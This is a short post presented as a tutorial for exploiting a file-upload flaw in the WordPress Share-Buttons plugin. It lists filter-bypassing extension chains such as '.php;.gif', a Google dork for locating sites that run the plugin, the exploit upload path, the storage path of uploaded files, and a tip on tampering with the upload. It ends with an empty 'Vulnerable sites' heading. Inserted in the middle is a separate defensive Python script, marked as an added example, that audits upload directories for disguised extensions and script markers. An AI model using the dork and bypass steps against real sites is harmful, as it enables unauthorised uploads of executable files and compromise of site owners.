WordPress Share-Buttons File Upload Vulnerability


The WordPress Share-Buttons plugin has a flaw that lets us upload files the filter would normally block, by manipulating the file extension as follows:


  • Vulnerable extensions: .php;.gif - .asp;.png - .shtml.fla;.jpeg
  • Google dork: inurl:"/wp-content/plugins/share-buttons/"
  • Admin panel path: /wp-login.php
  • Uploaded file path: /wp-content/plugins/share-buttons/upload/uploads/[filename]-[random-number].png

Tutorial

Copy the Google dork above, or extend it to find more sites, then enter the following exploit path: /wp-content/plugins/share-buttons/upload/index.php

Vulnerable?





Note: Upload your file with a modified extension, or with a jpg extension using Tamper Data.
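A defensive check for the extension trick described above, as an added example that is not part of the original post or the plugin's code: it audits an upload directory for stored names that hide an executable extension (.php;.gif, .asp;.png, .shtml.fla;.jpeg) and for script markers inside files that carry an image extension. The extension lists, the marker list and the sample files are assumptions constructed for illustration.

```python
import re
import tempfile
from pathlib import Path

# Assumed lists, not taken from the plugin's code: tune them for your server.
EXECUTABLE_EXTS = {"php", "php5", "phtml", "phar", "asp", "aspx", "shtml", "cgi", "pl", "jsp"}
ALLOWED_FINAL_EXTS = {"png", "gif", "jpg", "jpeg"}
SCRIPT_MARKERS = (b"<?php", b"<%@", b"<!--#exec", b"<!--#include")
# Constructed sample files (name -> body); the names reuse the extension chains listed above.
SAMPLES = {
    "logo-48213.png": b"\x89PNG\r\n\x1a\n" + b"\x00" * 16,
    "banner.php;.gif": b"GIF89a",
    "page.asp;.png": b"\x89PNG\r\n\x1a\n",
    "menu.shtml.fla;.jpeg": b"\xff\xd8\xff\xe0",
    "photo-7731.jpg": b"\xff\xd8\xff\xe0 <?PHP /* constructed marker */ ?>",
}

def audit_name(filename):
    """Return the reasons a stored file name is suspicious (empty list = clean)."""
    exts = [t for t in re.split(r"[.;]", filename.lower()) if t][1:]
    reasons = ["semicolon in name"] if ";" in filename else []
    hidden = sorted(set(exts) & EXECUTABLE_EXTS)
    if hidden:
        reasons.append("executable extension: " + ",".join(hidden))
    if not exts or exts[-1] not in ALLOWED_FINAL_EXTS:
        reasons.append("final extension is not an allowed image type")
    return reasons

def audit_content(data):
    """Return script markers found in the file body, whatever the extension says."""
    lowered = data.lower()
    return ["script marker: " + m.decode() for m in SCRIPT_MARKERS if m in lowered]

def audit_directory(upload_dir):
    """Map each suspicious file in upload_dir to the reasons it was flagged."""
    findings = {}
    for path in sorted(p for p in Path(upload_dir).iterdir() if p.is_file()):
        reasons = audit_name(path.name) + audit_content(path.read_bytes())
        if reasons:
            findings[path.name] = reasons
    return findings

def audit_samples():
    """Write SAMPLES to a temporary directory and audit it."""
    with tempfile.TemporaryDirectory() as tmp:
        for name, body in SAMPLES.items():
            (Path(tmp) / name).write_bytes(body)
        return audit_directory(tmp)
```

On a real site, call `audit_directory()` on the plugin's `upload/uploads` directory; treat content hits as leads to review, since short markers can occur by chance in binary data.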


Vulnerable sites:





